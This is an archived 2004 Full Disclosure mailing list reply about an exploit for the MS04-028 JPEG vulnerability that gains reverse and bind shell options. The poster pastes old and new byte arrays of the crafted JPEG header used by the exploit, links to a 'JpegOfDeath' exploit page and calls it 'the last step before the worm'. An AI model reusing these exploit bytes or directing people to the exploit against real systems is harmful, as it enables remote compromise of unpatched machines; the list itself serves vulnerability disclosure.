Full Disclosure mailing list archives
Re: MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ...
From: "morning_wood" <se_cur_ity () hotmail com>
Date: Sat, 25 Sep 2004 11:05:50 -0700
umm, no all this has thats different is correct headers for bind or remote shell option. and ability to set ports and return ip in the code, instead of needing to use your own shellcode ( or metasploits ) note: there is no new exploit code or vector ------------------- / snip /----------------- new. char header1[] = "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64" "\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00" "\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65" "\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19" "\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26" "\x2E\x3E\x35\x35\x35\x35\x35\x3E"; ------------------- / snip /----------------- old. ------------------- / snip /----------------- char header1[]= "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64" "\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00" "\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65" "\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19" "\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26" "\x2E\x3E\x35\x35\x35\x35\x35\x3E"; ------------------- / snip /----------------- take your media hype and die kthnx, m.wood
the last step before the worm http://www.k-otik.com/exploits/09252004.JpegOfDeath.c.php
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ... ElviS .de (Sep 25)
- Re: MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ... Ali Campbell (Sep 25)
- RE: MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ... raza (Sep 25)
- Re: MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ... Filbert (Sep 25)
- Re: MS04-028 Jpeg EXPLOIT - msn i.t (Sep 26)
- RE: MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ... raza (Sep 25)
- Re: MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ... Ali Campbell (Sep 25)
- Re: MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ... morning_wood (Sep 25)
- <Possible follow-ups>
- RE: MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ... Castigliola, Angelo (Sep 27)
- RE: MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ... Todd Towles (Sep 27)
- Re: MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ... GuidoZ (Sep 28)
- RE: MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ... r00t3d (Sep 29)